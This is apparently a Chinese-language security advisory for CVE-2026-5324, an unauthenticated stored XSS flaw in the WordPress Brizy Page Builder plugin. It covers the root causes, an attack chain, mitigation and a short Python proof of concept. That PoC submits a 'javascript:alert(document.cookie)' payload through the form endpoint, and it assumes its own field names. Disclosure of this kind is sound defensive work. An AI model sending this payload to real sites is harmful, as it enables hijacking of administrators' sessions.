IPBUF安全漏洞报告
English
CVE-2026-5324 CVSS 7.2 高危

CVE-2026-5324: Brizy插件存储型XSS漏洞

披露日期: 2026-05-02
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-5324
漏洞类型
存储型跨站脚本
CVSS评分
7.2 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
WordPress Brizy – Page Builder插件

相关标签

XSSWordPressBrizyCVE-2026-5324无需认证存储型XSS

漏洞概述

WordPress插件Brizy – Page Builder在2.8.11及之前版本存在未认证存储型XSS漏洞。由于缺少nonce验证、文件上传字段处理不当以及安全编码反转,未认证攻击者可注入恶意脚本。当管理员查看表单Leads页面时,脚本将被执行,可能导致管理员会话劫持或其他恶意操作。

技术细节

该漏洞主要由三个逻辑缺陷引发。首先,`api.php`中的`submit_form()`函数对未登录用户跳过了nonce验证,允许匿名表单提交。其次,`handleFileTypeFields()`函数在未上传文件时未能覆盖用户提供的值,允许攻击者控制本应仅用于文件路径的字段。最关键的是,虽然数据存储时使用了`htmlentities()`进行编码,但在后台显示时通过`html_entity_decode()`(form-entries.php:79)反转了编码。最后,`form-data.php`模板在href属性中直接输出这些值而未使用`esc_url()`过滤。这使得攻击者可以构造恶意表单提交,当管理员在后台查看“Leads”页面时,注入的JavaScript代码将在管理员浏览器上下文中执行。

攻击链分析

STEP 1
步骤1:侦察
攻击者识别出目标站点使用了Brizy – Page Builder插件,且版本在2.8.11及以下。
STEP 2
步骤2:漏洞利用
攻击者构造特制的HTTP POST请求,向表单提交接口发送数据。在文件上传字段中不包含文件,而是填入恶意Payload(如javascript:alert(1))。由于未登录用户跳过了Nonce验证,请求被接受。
STEP 3
步骤3:数据存储
恶意数据经过`htmlentities()`编码后存入数据库。
STEP 4
步骤4:触发漏洞
管理员登录WordPress后台,导航至Brizy的表单Leads页面查看提交记录。
STEP 5
步骤5:执行攻击
页面渲染时,通过`html_entity_decode()`反转编码,并在href属性中直接输出Payload,导致管理员浏览器执行恶意JavaScript脚本。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (example) target = "http://target-wordpress.com/wp-admin/admin-ajax.php" # The payload injects a javascript URI into a file upload field # Exploiting the lack of nonce check and the html_entity_decode logic payload_data = { "action": "brizy_form_submit", "post_id": "1", # Assuming 'file_upload' is the vulnerable field name "form_fields": { "email": "[email protected]", "file_upload": "javascript:alert(document.cookie)" } } try: response = requests.post(target, data=payload_data) if response.status_code == 200: print("[+] Payload sent successfully.") print("[+] If exploited, XSS triggers when admin views Form Leads.") else: print("[-] Request failed.") except Exception as e: print(f"Error: {e}")

影响范围

Brizy – Page Builder <= 2.8.11

防御指南

临时缓解措施
如果无法立即升级,建议暂时禁用Brizy插件的表单收集功能,或限制WordPress管理后台的访问IP。管理员应避免点击来源不明的表单链接,直到补丁应用。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表